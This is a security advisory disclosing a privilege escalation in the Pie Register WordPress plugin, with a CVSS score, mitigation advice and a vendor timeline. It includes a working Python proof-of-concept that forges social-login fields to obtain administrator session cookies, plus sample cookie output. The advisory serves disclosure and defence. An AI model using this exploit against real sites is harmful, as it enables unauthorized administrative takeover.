Pie Register 2.0.14-2.0.15, Privilege Escalation
User input is not validated correctly when accepting a login request via the Pie Register plugin. It is possible to manipulate posted variables in order to login using an arbitrary User ID (such as 1, for the default Administrative account).
Homepage
https://wordpress.org/plugins/pie-register/
CVSS Score
6.4
CSSS Vector
(AV:N/AC:L/Au:N/C:P/I:P/A:N)
Attack Scope
remote
Authorization Required
None
Mitigation
Uninstall the plugin – or patch manually
Proof of Concept
The following PoC will output Cookies required to be authenticated as the User with the ID of 1
import requests
target="http://localhost"
payload = {
"log":"a",
"pwd":"a",
"social_site":"true",
"user_id_social_site":1
}
r = requests.post(target, data=payload, allow_redirects=False)
print requests.utils.dict_from_cookiejar(r.cookies)
Output
~$ python g0blin-00041.py
{'wordpress_logged_in_70490311fe7c84acda8886406a6d884b': 'test%7C1426764966%7CQ9EFemgr3znqQlg8lgZOMNA1bcwfxIJy2zXsdfT02XT%7C441d78476ba286c940cd5f7ed9bad4ac8b929732698f6ce12f2ce298c1b7242e', 'wordpress_70490311fe7c84acda8886406a6d884b': 'test%7C1426764966%7CQ9EFemgr3znqQlg8lgZOMNA1bcwfxIJy2zXsdfT02XT%7C5569b7140838cecf91b77cb70f2c68f4fa5546e1b7cc71ce417856882d3c6436'}
Timeline
- 2015-03-16: Discovered
- 2015-03-16: Vendor notified
- 2015-03-17: Vendor responded – already fixed in a pending 2.0.15 release – stated would allow for review prior to release
- 2015-03-24: Vendor responded – stated new version in testing – will be released mid April
- 2015-04-13: Update requested from Vendor
- 2015-04-20: Update requested from Vendor
- 2015-04-20: Vendor states new version
- 2015-04-29: Update requested from Vendor – stated reports to be released on Monday due to lack of communication
- 2015-04-30: Version 2.0.15 released – issue still present – no chance for review given
- 2015-05-04: Advisory released: